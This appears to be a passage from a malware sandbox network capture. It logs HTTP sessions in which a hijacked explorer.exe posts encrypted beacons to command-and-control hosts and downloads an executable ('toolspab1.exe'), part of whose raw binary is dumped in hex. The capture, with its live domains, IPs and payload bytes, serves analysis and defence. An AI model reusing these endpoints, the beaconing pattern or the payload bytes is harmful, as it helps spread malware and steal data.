d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d b8 f8 15 34 33 2a 5a 40 3d 79 4c 8e 7b a9 67 11 f7 c6 ee fe 94 33 40 a4 68 26 58 66 57 ae ee d6 85 fa 1c 91 08 b2 26 06 cc 8c 29 bb ad 3f 72 99 4d cb c5 6e 01 46 9d 17 8a ad 1c f1 fa 46 29 a2 1b 1e 6a f2 07 c1 87 0b cc cc 05 e9 c2 69 a1 56 1e e1 aa f2 5b 48 4c f8 69 06 6c 78 6e 7a 6e ca 4b 7b 93 24 f5 cf 53 a0 70 9a 3c 34 42 f9 55 6b f0 4e d3 d3 f3 e2 b6 59 c3 ed Data Ascii: `@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGHQo?y!bHD_\ktj#^PKmi3{Gu >3sId$4Jt3T[.c:l}pbT.g6f=$OS-eI~_D!{@z%Qa?\|8HkJ{-a\F4l2l)\|}~qjYO;iLuFW;b#1MN+Lb1<'i3FHUh+U@Wd{9f(B@w=fdQpKk.nTUQ}o)2([T&}Wbig\hU\|,N[ytYPm#z+(Dzk7@\D&):?~Mpvn%.ug#;ZCChUbZ@3%}/#6mWhR!LEsCRZXySd-`.';BVHse%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=43Z@=yL{g3@h&XfW&)?rMnFF)jiV[HLilxnznK{$Sp<4BUkNY
Jan 9, 2022 18:48:33.998267889 CET	12837	IN	Data Raw: a6 ae e0 98 c0 6e 25 47 df 28 e9 61 70 58 3a 5a cc e3 cc ad aa ce cf d3 e6 87 47 2a 79 43 b8 ea 7f ef 4a 7b 94 f4 11 85 8c e0 ca 56 c0 5c aa 09 ea 60 fa 7a 88 eb 9f 28 69 a6 65 3c 65 1a f1 0c fa a1 0d 17 10 1d 7c ab a1 1c f9 80 27 63 6f f0 11 a6 Data Ascii: n%G(apX:ZG*yCJ{V\`z(ie<e\|'co/+9Eoaz=P%?0vQq" /T.g)7m,un~+nZvCz.6Vm"4^+ZjHe^(u4YC\?^#
Jan 9, 2022 18:48:34.239877939 CET	12839	IN	Data Raw: b1 25 ff 7a 2b 34 ae aa 49 c8 1f 5b 96 97 cd ae f5 3b 67 1d d7 18 a5 0a be 3f 9f df 1c dd af 2b 34 c3 e6 e8 40 9c b0 68 71 96 02 1c 52 5c 8e 5a 0e 93 11 f0 c1 80 a2 76 bf ae b9 f1 82 47 d3 fb 22 20 56 c9 e0 01 c9 a1 d7 ec 89 3a e2 89 5f de d6 b6 Data Ascii: %z+4I[;g?+4@hqR\ZvG" V:_UQft$PxX)RMUkSHV~Mp5\|Stw9{c[8]{P=qn4P2T8d\~IuGFd31#MCh(3;l[iWY2{*
Jan 9, 2022 18:48:34.239948034 CET	12840	IN	Data Raw: af 5c ab ab a1 f1 5b a2 21 2e 3f 00 36 35 9a 5d 59 79 f9 ab f5 ac 85 c9 f7 21 39 ed 0d 10 91 a9 01 69 9d 2d 66 1f e1 69 73 78 74 8e 32 ac 8a e8 75 76 3c 15 3a 93 e3 af 92 05 04 e8 63 60 d5 34 c4 60 c8 ac dc c2 a3 8d b1 05 02 23 89 43 fe 7e 42 4f Data Ascii: \[!.?65]Yy!9i-fisxt2uv<:c`4`#C~BOcq-ilV}k\RqTkeip^lW26=j+WMH65Sv-?vH)4NYauM^EOPiBW;@#p/u'\(X`t_
Jan 9, 2022 18:48:34.240000010 CET	12841	IN	Data Raw: 98 3b 7e ea 14 84 a3 e0 27 a5 b3 6b b8 f9 22 1b 43 04 a5 dc 7a f4 12 f9 62 20 69 70 cd fd 52 3a 85 78 1d 5b f5 40 1a 5d b1 91 89 b0 78 a0 fc 73 44 85 86 44 08 a4 ee ba 64 84 b0 4c b6 ef c5 bf fe 4e 5f 58 0e 44 da e0 33 78 70 c8 56 c0 17 af 16 96 Data Ascii: ;~'k"Czb ipR:x[@]xsDDdLN_XD3xpV4Ufn,y{)8,AVoy71x}z.r95:U%L:,tgGB%Q'zssMA%3S]&jc(2k~[\|z+MB"EXy5=yZM!'
Jan 9, 2022 18:48:34.240050077 CET	12843	IN	Data Raw: 31 e6 c1 31 15 a7 ee a6 5d 1c 19 71 75 61 4c 91 11 87 d7 03 a2 3e 8e c9 a2 d5 0d 3c 78 33 48 70 8d 37 82 d6 13 ff ab c7 10 0b 28 c1 fe 79 d9 7c 8e c9 dd cb 97 60 d4 48 5b ab ab 01 ff 63 1a 47 a7 25 21 30 1a 99 8b 4a 61 af 22 43 fa c3 ec a5 c1 b7 Data Ascii: 11]quaL><x3Hp7(y\|`H[cG%!0Ja"C,dA@%m8TrQV\|\v$\|s'P??o2v#xIun'MGx)gO5r9v>'auO(W'>+<<o$EYNI2{oDeTXR6%
Jan 9, 2022 18:48:34.481641054 CET	12844	IN	Data Raw: 68 7a 55 78 e7 de 0a 84 ab 2f d4 93 3f 9d c9 c6 38 95 59 dd d8 2d f4 e4 e6 5b 0d dd 1f 5c a6 2c 7d 25 0b c0 6d 17 a3 cb c5 13 aa 5b 77 77 cb aa a1 b0 78 1f c1 6b 9e 23 01 10 81 76 29 ce fb 77 0f 6d 5e 3b 9f 10 11 c1 56 2c dd ea 25 91 ce 71 c7 f6 Data Ascii: hzUx/?8Y-[\,}%m[wwxk#v)wm^;V,%qneK@-.QL9.h}tz+y-Ktdi`:s&V ?3<a40IDat;4XqJM;"%[V7->%Un}l^SPs
Jan 9, 2022 18:48:34.481719017 CET	12845	IN	Data Raw: bc a7 05 eb 1a 47 fd 0c ac aa f9 4a 42 fa a5 50 9f 10 6b be 54 02 e7 d4 c7 94 b3 a5 9c c3 a4 e9 c8 cb c3 dc 5b 5e 22 8f 16 8c 18 ea bc d6 0d 3d d3 75 08 0d 40 a8 82 f3 0e 79 b8 9c e4 57 0c db 82 fe ab 8e f3 2d 0e cc 0b e3 d5 6b 7e ff 07 7b db f7 Data Ascii: GJBPkT[^"=u@yW-k~{r6&9ukRcsFH;`1{r,2(.y[U\dx*WVCnBMG,e+6Lx.qp^)4EX\|<a.ny0P)e'xyu
Jan 9, 2022 18:48:34.481770992 CET	12847	IN	Data Raw: fe ec 23 d2 d8 69 88 77 9e 27 88 6a 2c 37 8d 0c ab 67 71 9c 4f 00 7e 4a 0e 1e aa 6f 6e 2f 63 3b b6 cc c3 b0 9c 86 83 c9 26 4a a6 45 f2 02 56 f9 47 10 d0 5b 31 b3 b2 14 6a 51 6f df 85 85 b1 09 a4 52 c4 2d 39 12 8f f5 40 89 f3 d6 79 36 d6 0b f0 95 Data Ascii: #iw'j,7gqO~Jon/c;&JEVG[1jQoR-9@y6kwbLmG3OHCY>'\dyb0RY*X?:RA@qC)Vn{C?T!{ az;KlXO-CcC12\|JxcL`/#
Jan 9, 2022 18:48:34.481822014 CET	12848	IN	Data Raw: a0 a1 8c f2 82 4b cc 10 8e 06 17 63 fa 67 75 24 72 5a 75 7b 97 b8 ca 85 d1 d2 8d 97 13 ff 1f 41 d2 ff 04 82 83 b4 6d d9 53 ef d4 f0 95 41 7e 30 b3 db 48 78 68 30 fc 0f bf d1 88 90 95 54 13 1e 65 b6 aa 8a db a9 d9 15 3e 77 b2 46 c3 be 36 87 ba 6a Data Ascii: Kcgu$rZu{AmSA~0Hxh0Te>wF6jkW"LQEO(V-C,MY;R}DjN&M'MpMQ"/[[s}NYzI?X'kF<l*{).]hvq-l.qrbA
Jan 9, 2022 18:48:34.481873989 CET	12850	IN	Data Raw: 67 c1 7d 1c 2c 88 2f 0e 39 f2 d4 50 d6 c0 10 17 ae 71 72 6d 52 e5 7b e6 b6 60 b4 86 71 16 e8 fd 7d a0 89 a2 20 fb 47 b0 7f b1 62 08 fd 17 4b a0 a1 31 96 7f 10 ef f0 71 7f ad 87 2f 61 a9 75 b3 53 d3 4e b9 46 25 9a 91 bb 21 39 c7 35 36 c8 c5 9b 89 Data Ascii: g},/9PqrmR{`q} GbK1q/auSNF%!956'lulnxWN"JkA.0@I\HS7Xr*LV%{xAL@FM_i/Yj9U5'^#y?(47\LIVc<0xUw@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.3	49856	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:38.328515053 CET	13423	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mrwsqu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: host-data-coin-11.com
Jan 9, 2022 18:48:38.328658104 CET	13424	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 88 66 5d 02 c8 a1 c1 64 53 a7 c2 01 Data Ascii: i;G~CE5i[nwmFu$f]dSnxI}gfJQQ-O}'V
Jan 9, 2022 18:48:38.901223898 CET	13559	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.3	49857	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:39.158551931 CET	13660	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jxnnlwoum.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 167 Host: host-data-coin-11.com
Jan 9, 2022 18:48:39.158577919 CET	13660	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 89 66 5d 02 c8 a1 c1 64 1b a9 90 7a Data Ascii: i;G~CE5i[nwmFu$f]dzM5#y`uD5Z=c@q]\|$3YwT,}+SyGxV2R7/mI OP
Jan 9, 2022 18:48:39.730808020 CET	13978	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:39 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.3	49858	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:39.937357903 CET	13978	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cxbcmk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 337 Host: host-data-coin-11.com
Jan 9, 2022 18:48:39.937427998 CET	13979	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 86 66 5d 02 c8 a1 c1 64 06 c6 84 7f Data Ascii: i;G~CE5i[nwmFu$f]dX~.o!5G%n\|rJx%h,)#NA][O/b209S?DS(dzMO>f6&p,oTO}E+;kvOSQR.cWQ\|rWO
Jan 9, 2022 18:48:40.512723923 CET	14437	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.3	49859	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:40.718861103 CET	14474	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://unhjp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 243 Host: host-data-coin-11.com
Jan 9, 2022 18:48:40.720433950 CET	14475	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 87 66 5d 02 c8 a1 c1 64 50 d4 98 0e Data Ascii: i;G~CE5i[nwmFu$f]dPj`mmLlf>5w\|nykSyD;.~O#OJc/NZ'oU3=~I'.L"00;yuv!mf1=0xZU\|U/yN.Elu'y
Jan 9, 2022 18:48:41.303172112 CET	14960	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e7 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.3	49860	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:41.776674986 CET	14961	OUT	GET /downloads/toolspab1.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: privacytools-foryou-777.com
Jan 9, 2022 18:48:42.309669971 CET	14962	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:42 GMT Content-Type: application/x-msdos-program Content-Length: 296448 Connection: close Last-Modified: Sun, 09 Jan 2022 17:48:01 GMT ETag: "48600-5d529d245249e" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 38 66 ce f5 7c 07 a0 a6 7c 07 a0 a6 7c 07 a0 a6 62 55 24 a6 57 07 a0 a6 62 55 35 a6 61 07 a0 a6 62 55 23 a6 fa 07 a0 a6 5b c1 db a6 79 07 a0 a6 7c 07 a1 a6 f7 07 a0 a6 62 55 2a a6 7d 07 a0 a6 62 55 34 a6 7d 07 a0 a6 62 55 31 a6 7d 07 a0 a6 52 69 63 68 7c 07 a0 a6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4d 4a 4f 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 01 00 00 3c 77 02 00 00 00 00 af 1e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 77 02 00 04 00 00 a1 79 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 10 03 00 3c 00 00 00 00 e0 76 02 d0 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f9 08 01 00 00 10 00 00 00 0a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 f9 01 00 00 20 01 00 00 fa 01 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 bb 73 02 00 20 03 00 00 86 00 00 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 f7 00 00 00 e0 76 02 00 f8 00 00 00 8e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 33 f6 83 3d 14 b6 b6 02 03 75 0b 56 56 56 56 56 ff 15 3c 20 41 00 89 75 fc 8b 45 10 89 45 fc 8b 45 0c 31 45 fc 8b 45 fc 8b 4d 08 89 01 5e c9 c2 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8f\|\|\|bU$WbU5abU#[y\|bU*}bU4}bU1}Rich\|PELMJO`<w @wy<v!@ .text `.rdata @@.datas @.rsrcv@@UQV3=uVVVVV< AuEEE1EEM^
Jan 9, 2022 18:48:42.309726000 CET	14963	IN	Data Raw: 0c 00 81 00 03 35 ef c6 c3 55 8b ec 83 ec 4c 8b 45 08 53 8b 58 04 56 8b 30 57 33 ff 81 3d 14 b6 b6 02 ee 00 00 00 89 75 ec 75 18 57 ff 15 88 20 41 00 ff 15 94 20 41 00 57 57 57 57 57 ff 15 08 20 41 00 a1 98 34 43 00 89 45 dc a1 9c 34 43 00 89 45 Data Ascii: 5ULESXV0W3=uuW A AWWWWW A4CE4CEE}Ey74CEE4CEE EE=EuEPWEPW8 AEE=u@.=u=CE0EE1MEM3
Jan 9, 2022 18:48:42.309765100 CET	14965	IN	Data Raw: 6b 02 00 00 83 c4 10 e8 6b 04 00 00 5e a1 d4 a2 43 00 a3 14 b6 b6 02 b8 3b 2d 0b 00 01 05 14 b6 b6 02 e8 5e fd ff ff 33 c0 c2 10 00 83 7e 18 08 72 09 ff 76 04 e8 32 04 00 00 59 83 66 14 00 33 c0 c7 46 18 07 00 00 00 66 89 46 04 c3 cc cc cc cc ba Data Ascii: kk^C;-^3~rv2Yf3FfF C! CU S39]uSSSSSWME;tVEEEPSuEPEEBSMxEEPSYY^[UEV3;uS
Jan 9, 2022 18:48:42.309809923 CET	14966	IN	Data Raw: 53 53 e8 a0 16 00 00 83 c4 14 8b c6 e9 07 01 00 00 e8 9a 2e 00 00 83 c0 20 f6 40 0c 40 75 5d 50 e8 e1 45 00 00 59 3b c6 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 60 ca b6 02 eb 05 b9 50 26 43 00 f6 41 24 7f 75 a2 3b c6 Data Ascii: SS. @@u]PEY;tt`P&CA$u;tt`P&C@$v/. Pj</YY]. P5u~B. PVjuA;u2-$x- - PjT
Jan 9, 2022 18:48:42.309855938 CET	14968	IN	Data Raw: dd 95 7a ff ff ff eb dd 55 8b ec 81 c4 30 fd ff ff 53 ff 75 0c ff 75 08 e8 b4 01 00 00 83 c4 08 ff 75 14 ff 75 10 e8 a6 01 00 00 83 c4 08 9b d9 bd 5c ff ff ff 80 8d 38 fd ff ff 02 c6 85 71 ff ff ff 01 e8 0c 43 00 00 e8 03 00 00 00 5b c9 c3 80 a5 Data Ascii: zU0Suuuu\8qC[8=CuO0pt<t[<t?t3rf\f uf tr\f6f%ftf=tCf6f%f=t0r("A
Jan 9, 2022 18:48:42.309904099 CET	14969	IN	Data Raw: c8 0a 00 00 f6 46 0c 40 75 5e 56 e8 82 3b 00 00 59 ba 50 26 43 00 83 f8 ff 74 1b 83 f8 fe 74 16 8b c8 83 e1 1f 8b f0 c1 fe 05 c1 e1 06 03 0c b5 60 ca b6 02 eb 02 8b ca f6 41 24 7f 75 91 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 83 e0 1f c1 f9 05 c1 e0 Data Ascii: F@u^V;YP&Ctt`A$utt`@$g3;]C, <Xw8"A333X"AjY;$/@
Jan 9, 2022 18:48:42.309947968 CET	14970	IN	Data Raw: fb 01 00 00 0f 84 e3 01 00 00 83 f8 65 0f 8c bc 03 00 00 83 f8 67 0f 8e 34 fe ff ff 83 f8 69 74 71 83 f8 6e 74 28 83 f8 6f 0f 85 a0 03 00 00 f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 08 00 00 00 74 61 81 8d f0 fd ff ff 00 02 00 00 eb 55 8b 37 83 c7 Data Ascii: eg4itqnt(otaU7/ tff@WugueY9~~?
Jan 9, 2022 18:48:42.309988022 CET	14972	IN	Data Raw: bc fd ff ff 00 74 13 ff b5 bc fd ff ff e8 90 21 00 00 83 a5 bc fd ff ff 00 59 8b 9d c4 fd ff ff 8a 03 88 85 ef fd ff ff 84 c0 74 13 8b 8d 94 fd ff ff 8b bd dc fd ff ff 8a d0 e9 e1 f5 ff ff 80 bd b0 fd ff ff 00 74 0a 8b 85 ac fd ff ff 83 60 70 fd Data Ascii: t!Ytt`pM_^3[U(@&@5&@&@&@&@0'@^(@UE4C]U(8&C3ESjLjP{!(0,
Jan 9, 2022 18:48:42.310033083 CET	14973	IN	Data Raw: 5e 5d c3 8b ff 55 8b ec 8b 0d 9c db b6 02 a1 a0 db b6 02 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b Data Ascii: ^]UkU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZU
Jan 9, 2022 18:48:42.310090065 CET	14975	IN	Data Raw: f0 49 3b f1 8d 7c 39 fc 8b 1f 89 4d 10 89 5d fc 0f 8e 55 01 00 00 f6 c3 01 0f 85 45 01 00 00 03 d9 3b f3 0f 8f 3b 01 00 00 8b 4d fc c1 f9 04 49 89 4d f8 83 f9 3f 76 06 6a 3f 59 89 4d f8 8b 5f 04 3b 5f 08 75 43 bb 00 00 00 80 83 f9 20 73 1a d3 eb Data Ascii: I;\|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO_YOyM+M}}MOL1?vj?_]][Y]YKYKY;YuWLM
Jan 9, 2022 18:48:42.486613989 CET	14976	IN	Data Raw: f8 85 c9 74 0b 89 0a 89 4c 11 fc eb 03 8b 4d f8 8b 75 f0 03 d1 8d 4e 01 89 0a 89 4c 32 fc 8b 75 f4 8b 0e 8d 79 01 89 3e 85 c9 75 1a 3b 1d 88 a6 43 00 75 12 8b 4d fc 3b 0d b0 db b6 02 75 07 83 25 88 a6 43 00 00 8b 4d fc 89 08 8d 42 04 5f 5e 5b c9 Data Ascii: tLMuNL2uy>u;CuM;u%CMB_^[h?@d5D$l$l$+SVW8&C1E3PeuEEEEdMdY__^[]QUS]Vs358&CWEE{tN38bENF3

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.3	49861	187.232.210.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:42.963339090 CET	15125	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gckkxgv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 356 Host: amogohuigotuli.at
Jan 9, 2022 18:48:42.963399887 CET	15126	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 b9 8a 14 62 cc d6 4f 96 ff ff 35 cc Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bO50T H $A]bIBq^1.U}]X6()f1;9.WSd({4Sd$ :28j-x\|F^=@Pt[J
Jan 9, 2022 18:48:43.619076967 CET	15271	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:43 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 327 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 